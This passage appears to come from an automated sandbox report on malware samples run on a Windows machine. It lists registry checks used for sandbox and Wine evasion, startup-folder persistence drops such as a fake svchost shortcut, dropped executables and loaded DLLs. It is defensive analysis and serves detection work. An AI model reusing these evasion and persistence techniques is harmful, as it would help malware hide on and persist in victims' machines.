N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr

phishing

A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr

phishing

A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr

phishing

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3020718451.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2568621829.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\seksiak.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\seksiak.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\seksiak.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\pornhub_downloader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\PORNHU~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\svchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\Desktop\Files\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\Desktop\Files\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Identification-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\87f3f2.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\onetap.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\Files\random.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\87f3f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe N/A
